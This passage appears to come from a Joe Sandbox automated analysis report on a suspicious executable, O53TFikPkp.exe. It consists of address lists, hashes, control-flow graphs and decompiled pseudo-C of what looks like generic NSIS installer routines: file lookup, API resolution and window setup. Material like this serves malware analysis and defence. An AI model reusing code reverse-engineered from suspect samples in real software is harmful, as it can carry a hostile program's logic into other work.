                                                                                            0x00406695
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040673f
                                                                                            0x00406743
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406768
                                                                                            0x0040676f
                                                                                            0x00406776
                                                                                            0x00406776
                                                                                            0x00000000
                                                                                            0x00406776
                                                                                            0x00406745
                                                                                            0x00406748
                                                                                            0x0040674b
                                                                                            0x0040674e
                                                                                            0x00406755
                                                                                            0x00406699
                                                                                            0x00406699
                                                                                            0x0040669c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406830
                                                                                            0x00406833
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040646a
                                                                                            0x0040646c
                                                                                            0x00406473
                                                                                            0x00406474
                                                                                            0x00406476
                                                                                            0x00406479
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406481
                                                                                            0x00406484
                                                                                            0x00406487
                                                                                            0x00406489
                                                                                            0x0040648b
                                                                                            0x0040648b
                                                                                            0x0040648c
                                                                                            0x0040648f
                                                                                            0x00406496
                                                                                            0x00406499
                                                                                            0x004064a7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040677d
                                                                                            0x0040677d
                                                                                            0x00406780
                                                                                            0x00406787
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040678c
                                                                                            0x0040678c
                                                                                            0x00406790
                                                                                            0x004068c8
                                                                                            0x00000000
                                                                                            0x004068c8
                                                                                            0x00406796
                                                                                            0x00406799
                                                                                            0x0040679c
                                                                                            0x004067a0
                                                                                            0x004067a3
                                                                                            0x004067a9
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ae
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b4
                                                                                            0x004067b4
                                                                                            0x004067b8
                                                                                            0x00406818
                                                                                            0x0040681b
                                                                                            0x00406820
                                                                                            0x00406821
                                                                                            0x00406823
                                                                                            0x00406825
                                                                                            0x00406828
                                                                                            0x00000000
                                                                                            0x00406828
                                                                                            0x004067ba
                                                                                            0x004067c0
                                                                                            0x004067c3
                                                                                            0x004067c6
                                                                                            0x004067c9
                                                                                            0x004067cc
                                                                                            0x004067cf
                                                                                            0x004067d2
                                                                                            0x004067d5
                                                                                            0x004067d8
                                                                                            0x004067db
                                                                                            0x004067f4
                                                                                            0x004067f7
                                                                                            0x004067fa
                                                                                            0x004067fd
                                                                                            0x00406801
                                                                                            0x00406803
                                                                                            0x00406803
                                                                                            0x00406804
                                                                                            0x00406807
                                                                                            0x004067dd
                                                                                            0x004067dd
                                                                                            0x004067e5
                                                                                            0x004067ea
                                                                                            0x004067ec
                                                                                            0x004067ef
                                                                                            0x004067ef
                                                                                            0x0040680a
                                                                                            0x00406811
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x004064af
                                                                                            0x004064b2
                                                                                            0x004064e8
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x0040661b
                                                                                            0x0040661b
                                                                                            0x0040661e
                                                                                            0x00406620
                                                                                            0x004068aa
                                                                                            0x00000000
                                                                                            0x004068aa
                                                                                            0x00406626
                                                                                            0x00406629
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040662f
                                                                                            0x00406633
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00000000
                                                                                            0x00406636
                                                                                            0x004064b4
                                                                                            0x004064b6
                                                                                            0x004064b8
                                                                                            0x004064ba
                                                                                            0x004064bd
                                                                                            0x004064be
                                                                                            0x004064c0
                                                                                            0x004064c2
                                                                                            0x004064c5
                                                                                            0x004064c8
                                                                                            0x004064de
                                                                                            0x004064e3
                                                                                            0x0040651b
                                                                                            0x0040651b
                                                                                            0x0040651f
                                                                                            0x0040654b
                                                                                            0x0040654d
                                                                                            0x00406554
                                                                                            0x00406557
                                                                                            0x0040655a
                                                                                            0x0040655a
                                                                                            0x0040655f
                                                                                            0x0040655f
                                                                                            0x00406561
                                                                                            0x00406564
                                                                                            0x0040656b
                                                                                            0x0040656e
                                                                                            0x0040659b
                                                                                            0x0040659b
                                                                                            0x0040659e
                                                                                            0x004065a1
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00000000
                                                                                            0x00406615
                                                                                            0x004065a3
                                                                                            0x004065a9
                                                                                            0x004065ac
                                                                                            0x004065af
                                                                                            0x004065b2
                                                                                            0x004065b5
                                                                                            0x004065b8
                                                                                            0x004065bb
                                                                                            0x004065be
                                                                                            0x004065c1
                                                                                            0x004065c4
                                                                                            0x004065dd
                                                                                            0x004065df
                                                                                            0x004065e2
                                                                                            0x004065e3
                                                                                            0x004065e6
                                                                                            0x004065e8
                                                                                            0x004065eb
                                                                                            0x004065ed
                                                                                            0x004065ef
                                                                                            0x004065f2
                                                                                            0x004065f4
                                                                                            0x004065f7
                                                                                            0x004065fb
                                                                                            0x004065fd
                                                                                            0x004065fd
                                                                                            0x004065fe
                                                                                            0x00406601
                                                                                            0x00406604
                                                                                            0x004065c6
                                                                                            0x004065c6
                                                                                            0x004065ce
                                                                                            0x004065d3
                                                                                            0x004065d5
                                                                                            0x004065d8
                                                                                            0x004065d8
                                                                                            0x00406607
                                                                                            0x0040660e
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x0040660e
                                                                                            0x00406521
                                                                                            0x00406524
                                                                                            0x00406526
                                                                                            0x00406529
                                                                                            0x0040652c
                                                                                            0x0040652f
                                                                                            0x00406531
                                                                                            0x00406534
                                                                                            0x00406537
                                                                                            0x00406537
                                                                                            0x0040653a
                                                                                            0x0040653a
                                                                                            0x0040653d
                                                                                            0x00406544
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00406544
                                                                                            0x004064ca
                                                                                            0x004064cd
                                                                                            0x004064cf
                                                                                            0x004064d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063bc
                                                                                            0x004063bc
                                                                                            0x004063c0
                                                                                            0x00406886
                                                                                            0x00000000
                                                                                            0x00406886
                                                                                            0x004063c6
                                                                                            0x004063c9
                                                                                            0x004063cc
                                                                                            0x004063cf
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d4
                                                                                            0x004063d7
                                                                                            0x004063da
                                                                                            0x004063dd
                                                                                            0x004063e0
                                                                                            0x004063e3
                                                                                            0x004063e4
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e9
                                                                                            0x004063ec
                                                                                            0x004063ef
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x0040663d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406643
                                                                                            0x00406646
                                                                                            0x00406649
                                                                                            0x0040664c
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x00406651
                                                                                            0x00406654
                                                                                            0x00406657
                                                                                            0x0040665a
                                                                                            0x0040665d
                                                                                            0x00406660
                                                                                            0x00406661
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406666
                                                                                            0x00406669
                                                                                            0x0040666c
                                                                                            0x0040666f
                                                                                            0x00406672
                                                                                            0x00406676
                                                                                            0x00406678
                                                                                            0x0040667b
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x0040667b
                                                                                            0x004068b0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                                                                                            • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                                                                                            • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                                                                                            • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 614 405d7c-405d90 FindFirstFileA 615 405d92-405d9b FindClose 614->615 616 405d9d 614->616 617 405d9f-405da0 615->617 616->617
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405D7C(CHAR* _a4) {
                                                                                            				void* _t2;
                                                                                            
                                                                                            				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
                                                                                            				if(_t2 == 0xffffffff) {
                                                                                            					return 0;
                                                                                            				}
                                                                                            				FindClose(_t2);
                                                                                            				return 0x4224e8;
                                                                                            			}




                                                                                            0x00405d87
                                                                                            0x00405d90
                                                                                            0x00000000
                                                                                            0x00405d9d
                                                                                            0x00405d93
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\O53TFikPkp.exe" ,73BCF560), ref: 00405D87
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405D93
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID: $B
                                                                                            • API String ID: 2295610775-2366330246
                                                                                            • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                                                                                            • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                                                                                            • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                                                                                            • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00405DA3(signed int _a4) {
                                                                                            				struct HINSTANCE__* _t5;
                                                                                            				CHAR* _t7;
                                                                                            				signed int _t9;
                                                                                            
                                                                                            				_t9 = _a4 << 3;
                                                                                            				_t7 =  *(_t9 + 0x409218);
                                                                                            				_t5 = GetModuleHandleA(_t7);
                                                                                            				if(_t5 != 0) {
                                                                                            					L2:
                                                                                            					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
                                                                                            				}
                                                                                            				_t5 = LoadLibraryA(_t7); // executed
                                                                                            				if(_t5 != 0) {
                                                                                            					goto L2;
                                                                                            				}
                                                                                            				return _t5;
                                                                                            			}






                                                                                            0x00405dab
                                                                                            0x00405dae
                                                                                            0x00405db5
                                                                                            0x00405dbd
                                                                                            0x00405dca
                                                                                            0x00000000
                                                                                            0x00405dd1
                                                                                            0x00405dc0
                                                                                            0x00405dc8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405dd9

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                                                                                            • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                            • String ID:
                                                                                            • API String ID: 310444273-0
                                                                                            • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                                                                                            • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                                                                                            • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                                                                                            • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 121 403659-403678 call 403897 call 405659 111->121 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->121 126 40367e-403683 121->126 127 4036ff-403707 call 405659 121->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 139 4036be-4036ca lstrlenA 135->139 140 4036af-4036bc call 4055a3 135->140 141 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->141 142 40388d 137->142 152 4037d3-4037d6 138->152 153 4037db-4037e6 call 403897 138->153 146 4036f2-4036fa call 405578 call 405a85 139->146 147 4036cc-4036da lstrcmpiA 139->147 140->139 141->138 144 40388f-403896 142->144 146->127 147->146 151 4036dc-4036e6 GetFileAttributesA 147->151 156 4036e8-4036ea 151->156 157 4036ec-4036ed call 4055bf 151->157 152->144 161 403864-40386c call 404ef5 153->161 162 4037e8-403805 ShowWindow LoadLibraryA 153->162 156->146 156->157 157->146 170 403886-403888 call 40140b 161->170 171 40386e-403874 161->171 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->144 170->142 171->152 174 40387a-403881 call 40140b 171->174 174->152
                                                                                            C-Code - Quality: 96%
                                                                                            			E004035E3() {
                                                                                            				intOrPtr _v4;
                                                                                            				intOrPtr _v8;
                                                                                            				int _v12;
                                                                                            				int _v16;
                                                                                            				char _v20;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				intOrPtr* _t20;
                                                                                            				void* _t28;
                                                                                            				void* _t30;
                                                                                            				int _t31;
                                                                                            				void* _t34;
                                                                                            				struct HINSTANCE__* _t37;
                                                                                            				int _t38;
                                                                                            				int _t42;
                                                                                            				char _t61;
                                                                                            				CHAR* _t63;
                                                                                            				signed char _t67;
                                                                                            				CHAR* _t78;
                                                                                            				intOrPtr _t80;
                                                                                            				CHAR* _t85;
                                                                                            
                                                                                            				_t80 =  *0x423eb0;
                                                                                            				_t20 = E00405DA3(6);
                                                                                            				_t87 = _t20;
                                                                                            				if(_t20 == 0) {
                                                                                            					_t78 = 0x420498;
                                                                                            					"1033" = 0x7830;
                                                                                            					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
                                                                                            					__eflags =  *0x420498;
                                                                                            					if(__eflags == 0) {
                                                                                            						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
                                                                                            					}
                                                                                            					lstrcatA("1033", _t78);
                                                                                            				} else {
                                                                                            					E004059E3("1033",  *_t20() & 0x0000ffff);
                                                                                            				}
                                                                                            				E00403897(_t75, _t87);
                                                                                            				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                                                                                            				 *0x423f20 =  *0x423eb8 & 0x00000020;
                                                                                            				if(E00405659(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                                                                                            					L16:
                                                                                            					if(E00405659(_t95, _t84) == 0) {
                                                                                            						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                                                                                            					}
                                                                                            					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                            					 *0x423688 = _t28;
                                                                                            					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                                                                            						L21:
                                                                                            						if(E0040140B(0) == 0) {
                                                                                            							_t30 = E00403897(_t75, __eflags);
                                                                                            							__eflags =  *0x423f40;
                                                                                            							if( *0x423f40 != 0) {
                                                                                            								_t31 = E00404EF5(_t30, 0);
                                                                                            								__eflags = _t31;
                                                                                            								if(_t31 == 0) {
                                                                                            									E0040140B(1);
                                                                                            									goto L33;
                                                                                            								}
                                                                                            								__eflags =  *0x42366c;
                                                                                            								if( *0x42366c == 0) {
                                                                                            									E0040140B(2);
                                                                                            								}
                                                                                            								goto L22;
                                                                                            							}
                                                                                            							ShowWindow( *0x420470, 5);
                                                                                            							_t37 = LoadLibraryA("RichEd20");
                                                                                            							__eflags = _t37;
                                                                                            							if(_t37 == 0) {
                                                                                            								LoadLibraryA("RichEd32");
                                                                                            							}
                                                                                            							_t85 = "RichEdit20A";
                                                                                            							_t38 = GetClassInfoA(0, _t85, 0x423640);
                                                                                            							__eflags = _t38;
                                                                                            							if(_t38 == 0) {
                                                                                            								GetClassInfoA(0, "RichEdit", 0x423640);
                                                                                            								 *0x423664 = _t85;
                                                                                            								RegisterClassA(0x423640);
                                                                                            							}
                                                                                            							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
                                                                                            							E0040140B(5);
                                                                                            							return _t42;
                                                                                            						}
                                                                                            						L22:
                                                                                            						_t34 = 2;
                                                                                            						return _t34;
                                                                                            					} else {
                                                                                            						_t75 =  *0x423ea0;
                                                                                            						 *0x423654 = _t28;
                                                                                            						_v20 = 0x624e5f;
                                                                                            						 *0x423644 = E00401000;
                                                                                            						 *0x423650 =  *0x423ea0;
                                                                                            						 *0x423664 =  &_v20;
                                                                                            						if(RegisterClassA(0x423640) == 0) {
                                                                                            							L33:
                                                                                            							__eflags = 0;
                                                                                            							return 0;
                                                                                            						}
                                                                                            						_t12 =  &_v16; // 0x624e5f
                                                                                            						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                                            						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
                                                                                            						goto L21;
                                                                                            					}
                                                                                            				} else {
                                                                                            					_t75 =  *(_t80 + 0x48);
                                                                                            					if(_t75 == 0) {
                                                                                            						goto L16;
                                                                                            					}
                                                                                            					_t78 = 0x422e40;
                                                                                            					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
                                                                                            					_t61 =  *0x422e40; // 0x6a
                                                                                            					if(_t61 == 0) {
                                                                                            						goto L16;
                                                                                            					}
                                                                                            					if(_t61 == 0x22) {
                                                                                            						_t78 = 0x422e41;
                                                                                            						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
                                                                                            					}
                                                                                            					_t63 = lstrlenA(_t78) + _t78 - 4;
                                                                                            					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                                                                                            						L15:
                                                                                            						E00405A85(_t84, E00405578(_t78));
                                                                                            						goto L16;
                                                                                            					} else {
                                                                                            						_t67 = GetFileAttributesA(_t78);
                                                                                            						if(_t67 == 0xffffffff) {
                                                                                            							L14:
                                                                                            							E004055BF(_t78);
                                                                                            							goto L15;
                                                                                            						}
                                                                                            						_t95 = _t67 & 0x00000010;
                                                                                            						if((_t67 & 0x00000010) != 0) {
                                                                                            							goto L15;
                                                                                            						}
                                                                                            						goto L14;
                                                                                            					}
                                                                                            				}
                                                                                            			}

























                                                                                            0x004035e9
                                                                                            0x004035f2
                                                                                            0x004035f9
                                                                                            0x004035fb
                                                                                            0x0040360f
                                                                                            0x00403621
                                                                                            0x0040362b
                                                                                            0x00403630
                                                                                            0x00403636
                                                                                            0x00403649
                                                                                            0x00403649
                                                                                            0x00403654
                                                                                            0x004035fd
                                                                                            0x00403608
                                                                                            0x00403608
                                                                                            0x00403659
                                                                                            0x00403663
                                                                                            0x0040366c
                                                                                            0x00403678
                                                                                            0x004036ff
                                                                                            0x00403707
                                                                                            0x00403710
                                                                                            0x00403710
                                                                                            0x00403726
                                                                                            0x0040372c
                                                                                            0x0040373a
                                                                                            0x004037c9
                                                                                            0x004037d1
                                                                                            0x004037db
                                                                                            0x004037e0
                                                                                            0x004037e6
                                                                                            0x00403865
                                                                                            0x0040386a
                                                                                            0x0040386c
                                                                                            0x00403888
                                                                                            0x00000000
                                                                                            0x00403888
                                                                                            0x0040386e
                                                                                            0x00403874
                                                                                            0x0040387c
                                                                                            0x0040387c
                                                                                            0x00000000
                                                                                            0x00403874
                                                                                            0x004037f0
                                                                                            0x00403801
                                                                                            0x00403803
                                                                                            0x00403805
                                                                                            0x0040380c
                                                                                            0x0040380c
                                                                                            0x00403814
                                                                                            0x0040381c
                                                                                            0x0040381e
                                                                                            0x00403820
                                                                                            0x00403829
                                                                                            0x0040382c
                                                                                            0x00403832
                                                                                            0x00403832
                                                                                            0x00403851
                                                                                            0x0040385b
                                                                                            0x00000000
                                                                                            0x00403860
                                                                                            0x004037d3
                                                                                            0x004037d5
                                                                                            0x00000000
                                                                                            0x00403740
                                                                                            0x00403740
                                                                                            0x00403746
                                                                                            0x00403750
                                                                                            0x00403758
                                                                                            0x00403762
                                                                                            0x00403768
                                                                                            0x00403776
                                                                                            0x0040388d
                                                                                            0x0040388d
                                                                                            0x00000000
                                                                                            0x0040388d
                                                                                            0x0040377c
                                                                                            0x00403785
                                                                                            0x004037c4
                                                                                            0x00000000
                                                                                            0x004037c4
                                                                                            0x0040367e
                                                                                            0x0040367e
                                                                                            0x00403683
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040368d
                                                                                            0x0040369d
                                                                                            0x004036a2
                                                                                            0x004036a9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004036ad
                                                                                            0x004036af
                                                                                            0x004036bc
                                                                                            0x004036bc
                                                                                            0x004036c4
                                                                                            0x004036ca
                                                                                            0x004036f2
                                                                                            0x004036fa
                                                                                            0x00000000
                                                                                            0x004036dc
                                                                                            0x004036dd
                                                                                            0x004036e6
                                                                                            0x004036ec
                                                                                            0x004036ed
                                                                                            0x00000000
                                                                                            0x004036ed
                                                                                            0x004036e8
                                                                                            0x004036ea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004036ea
                                                                                            0x004036ca

                                                                                            APIs
                                                                                              • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                                                                                              • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                                                                                              • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                                                                                            • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\O53TFikPkp.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                                                                                            • lstrlenA.KERNEL32(jwcvvjog,?,?,?,jwcvvjog,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\O53TFikPkp.exe" ), ref: 004036BF
                                                                                            • lstrcmpiA.KERNEL32(?,.exe,jwcvvjog,?,?,?,jwcvvjog,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                                                                                            • GetFileAttributesA.KERNEL32(jwcvvjog), ref: 004036DD
                                                                                            • LoadImageA.USER32 ref: 00403726
                                                                                              • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                                                                                            • RegisterClassA.USER32 ref: 0040376D
                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                                                                                            • CreateWindowExA.USER32 ref: 004037BE
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                                                                                            • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                                                                                            • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                                                                                            • GetClassInfoA.USER32 ref: 0040381C
                                                                                            • GetClassInfoA.USER32 ref: 00403829
                                                                                            • RegisterClassA.USER32 ref: 00403832
                                                                                            • DialogBoxParamA.USER32 ref: 00403851
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Users\user\Desktop\O53TFikPkp.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$jwcvvjog
                                                                                            • API String ID: 914957316-2778503361
                                                                                            • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                                                                                            • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                                                                                            • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                                                                                            • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
